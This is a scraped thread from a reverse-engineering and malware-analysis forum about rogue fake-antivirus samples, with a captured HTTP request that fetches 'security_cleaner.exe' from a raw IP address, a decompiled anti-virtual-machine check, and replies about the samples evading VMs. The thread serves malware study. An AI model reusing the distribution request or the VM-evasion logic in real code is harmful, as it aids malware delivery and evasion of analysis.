Attachments
pass: infected
(559.81 KiB) Downloaded 119 times
(559.81 KiB) Downloaded 119 times
A forum for reverse engineering, OS internals and malware analysis
GET /index.php?c=RaEQL35Qhmg8kIEAyKydUWLt2abuVSeZkMW823tcOdHLi+sHzn+IhzfWz0ESjU4fq3YMhr4Xf4T8yLo0G1yosbiJyssK1LCmIKe4X6XXotKxBA== HTTP/1.1
Host: 212.7.195.124
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Referer: hxxp://212.7.195.124/index.php?c=RaENOjEayDF925cOxP3ACC60zajgAjCTlcK0liAaKtvKheVQzm+YhzfWz1MPnw1S6zBdyf4bfpf/naQjDQHx5/+ByoM=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: uid=100
HTTP/1.1 200 OKSystem Care Antivirus
Server: nginx
Date: Thu, 22 Aug 2013 09:44:32 GMT
Content-Type: application/octet-stream
Content-Length: 512000
Connection: keep-alive
X-Powered-By: PHP/5.3.26
Content-Disposition: attachment;filename="security_cleaner.exe"
Win32:Virut wrote:Hello, it is downloading empty file for me.Works here too. Is your AV blocking it?
if ( dword_44E050(L"C:\\sd2.dbg") != -1 )
dword_44E1A8(0);
if ( dword_44E050(L"C:\\sd.dbg") == -1 )
{
v15 = *(_DWORD *)"VMWARE";
v16 = *(_WORD *)"RE";
v17 = aVmware_0[6];
v11 = *(_DWORD *)"VIRTUAL HD";
v12 = *(_DWORD *)"UAL HD";
v13 = *(_WORD *)"HD";
v14 = aVirtualHd[10];
v5 = dword_47223C[0];
.................
bitstechs wrote:PC Defender 360 and My Safe PC 2014 not working on my virtual machine. Anyone else have any luck?How many times this must be told? They almost all VM aware. Use real machine or patched VM.